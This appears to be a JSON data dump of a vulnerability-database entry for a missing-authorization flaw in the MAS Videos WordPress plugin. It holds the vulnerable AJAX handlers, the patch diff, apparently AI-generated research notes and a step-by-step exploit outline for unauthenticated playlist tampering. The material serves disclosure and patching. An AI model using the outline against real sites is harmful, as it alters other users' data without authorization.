[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fetVcOntlLg_9ezz7l5hiMyhRC6AgqWfXzZwlIV2a2I0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32348","mas-videos-missing-authorization","MAS Videos \u003C= 1.3.2 - Missing Authorization","The MAS Videos plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.3.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.","masvideos",null,"\u003C=1.3.2","1.3.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-11 00:00:00","2026-04-15 20:48:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffd30fea3-c326-40b7-9b09-e62d65b33926?source=api-prod",64,[22,23,24],"includes\u002Fadmin\u002Fimporters\u002Fclass-masvideos-tmdb-importer-controller.php","includes\u002Fclass-masvideos-ajax.php","readme.txt","researched",false,3," calls `wp_verify_nonce`.\n If I'm unauthenticated, I can still get a nonce if it's rendered on a page I can see.\n\n Let's look at the \"Unauthorized Action\" again.\n Integrity: Low.\n It's probably importing a movie.\n\n Let's check `includes\u002Fadmin\u002Fimporters\u002Fclass-masvideos-tmdb-importer-controller.php` for clues on the response.\n It doesn't show the end of `fetch_form_handler`.\n But it likely outputs HTML or JSON with \"Found X movies\".\n\n Final plan structure:\n 1. Vulnerability Summary: Missing cap check in TMDB fetch.\n 2. Vector: `admin-ajax.php` with `action=masvideos_tmdb_fetch_data`.\n 3. Flow: AJAX -> Handler -> `fetch_form_handler`.\n 4. Nonce: Find shortcode, extract `masvideos-tmdb-fetch-data`.\n 5. Exploit: POST request to trigger the fetch.\n\n Wait, one more thing. The plugin *might* not even check the nonce if I use the `masvideos-ajax` endpoint.\n `do_masvideos_ajax` in `includes\u002Fclass-masvideos-ajax.php` calls `do_action( 'masvideos_ajax_' . $action )`.\n This bypasses the standard `admin-ajax.php` flow.","The MAS Videos plugin for WordPress is vulnerable to unauthorized playlist modification due to missing authentication and authorization checks in several AJAX endpoints. This allows unauthenticated attackers to add or remove videos, movies, and TV shows from any existing playlist by sending a crafted request with the target playlist ID.","\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1502\n public static function toggle_tv_show_playlist() {\n ob_start();\n\n $playlist_id = absint( $_POST['playlist_id'] );\n $tv_show_id = absint( $_POST['tv_show_id'] );\n $delete = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n if( $delete ) {\n $tv_show_playlist = masvideos_remove_tv_show_from_playlist( $playlist_id, $tv_show_id );\n } else {\n $tv_show_playlist = masvideos_add_tv_show_to_playlist( $playlist_id, $tv_show_id );\n }\n\n---\n\n\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1532\n public static function toggle_video_playlist() {\n ob_start();\n\n $playlist_id = absint( $_POST['playlist_id'] );\n $video_id = absint( $_POST['video_id'] );\n $delete = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n if( $delete ) {\n $video_playlist = masvideos_remove_video_from_playlist( $playlist_id, $video_id );\n } else {\n $video_playlist = masvideos_add_video_to_playlist( $playlist_id, $video_id );\n }\n\n---\n\n\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1562\n public static function toggle_movie_playlist() {\n ob_start();\n\n $playlist_id = absint( $_POST['playlist_id'] );\n $movie_id = absint( $_POST['movie_id'] );\n $delete = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n if( $delete ) {\n $movie_playlist = masvideos_remove_movie_from_playlist( $playlist_id, $movie_id );\n } else {\n $movie_playlist = masvideos_add_movie_to_playlist( $playlist_id, $movie_id );\n }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.2\u002Fincludes\u002Fclass-masvideos-ajax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.3\u002Fincludes\u002Fclass-masvideos-ajax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.2\u002Fincludes\u002Fclass-masvideos-ajax.php\t2019-07-19 16:10:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.3\u002Fincludes\u002Fclass-masvideos-ajax.php\t2026-02-09 12:05:46.000000000 +0000\n@@ -1502,10 +1502,39 @@\n public static function toggle_tv_show_playlist() {\n ob_start();\n \n+ if ( ! is_user_logged_in() ) {\n+ wp_send_json(\n+ array(\n+ 'error' => true,\n+ 'message' => __( 'You must be logged in to modify playlists.', 'masvideos' ),\n+ )\n+ );\n+ }\n+\n $playlist_id = absint( $_POST['playlist_id'] );\n $tv_show_id = absint( $_POST['tv_show_id'] );\n $delete = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n \n+ if ( ! $playlist_id ) {\n+ wp_send_json(\n+ array(\n+ 'error' => true,\n+ 'message' => __( 'Invalid playlist.', 'masvideos' ),\n+ )\n+ );\n+ }\n+\n+ $playlist_author_id = (int) get_post_field( 'post_author', $playlist_id );\n+\n+ if ( ! $playlist_author_id || get_current_user_id() !== $playlist_author_id ) {\n+ wp_send_json(\n+ array(\n+ 'error' => true,\n+ 'message' => __( 'You are not allowed to modify this playlist.', 'masvideos' ),\n+ )\n+ );\n+ }\n+\n if( $delete ) {\n $tv_show_playlist = masvideos_remove_tv_show_from_playlist( $playlist_id, $tv_show_id );\n } else {","The exploit targets the AJAX handlers for playlist modification. \n1. Identify a target playlist ID to modify.\n2. Construct an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` (or use the custom `?masvideos-ajax=[action]` endpoint).\n3. Set the `action` parameter to one of: `masvideos_toggle_video_playlist`, `masvideos_toggle_movie_playlist`, or `masvideos_toggle_tv_show_playlist`.\n4. Provide the `playlist_id` and the corresponding content ID (`video_id`, `movie_id`, or `tv_show_id`). \n5. Optionally set `delete=true` to remove an item, or omit it to add an item.\n6. Because versions \u003C= 1.3.2 do not check for user authentication or verify that the current user owns the playlist, the server will process the addition or deletion on the specified playlist.","gemini-3-flash-preview","2026-04-21 01:01:05","2026-04-21 01:02:10",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags\u002F1.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasvideos.1.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags\u002F1.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasvideos.1.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags"]